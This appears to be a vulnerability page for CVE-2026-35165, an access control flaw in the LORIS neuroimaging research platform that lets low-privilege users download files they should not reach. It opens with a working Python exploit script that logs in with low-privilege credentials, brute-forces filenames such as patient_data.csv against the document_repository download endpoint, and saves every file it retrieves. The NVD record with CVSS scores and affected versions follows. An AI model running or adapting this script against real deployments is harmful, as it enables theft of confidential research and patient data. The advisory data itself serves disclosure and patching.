CVE-2026-35165

import requests # Configuration target_url = "https://example.com/document_repository/download" login_url = "https://example.com/login" username = "low_priv_user" password = "password" # Common filenames to brute force (examples) wordlist = ["patient_data.csv", "config.php", "admin_notes.pdf", "results_2026.docx"] def exploit(): session = requests.Session() # Step 1: Authenticate as a low-privilege user login_data = {"username": username, "password": password} session.post(login_url, data=login_data) print(f"[*] Logged in as {username}") # Step 2: Brute force filenames for filename in wordlist: # Parameter name may vary (e.g., 'file', 'filename', 'id') params = {"file": filename} response = session.get(target_url, params=params) # Check if download was successful (HTTP 200 and valid content) if response.status_code == 200 and "Content-Disposition" in response.headers: print(f"[+] SUCCESS! Downloaded: {filename}") # Save file with open(f"downloaded_{filename}", "wb") as f: f.write(response.content) else: print(f"[-] Failed to access: {filename}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-35165", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:23.300", "lastModified": "2026-04-21T20:18:26.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 21.0.0 to before 27.0.3 and 28.0.1, while the document_repository frontend was restricting file access, the backend endpoint was not correctly verifying access permissions. A user could theoretically download a file that they should not have access to, if they know or can brute force the filename. This vulnerability is fixed in 27.0.3 and 28.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0.0", "versionEndIncluding": "27.0.2", "matchCriteriaId": "752BF9F7-1E9D-4E71-AAC8-43F3E1533399"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"}]}]}], "references": [{"url": "https://github.com/aces/Loris/security/advisories/GHSA-qp6x-qfx7-54wp", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}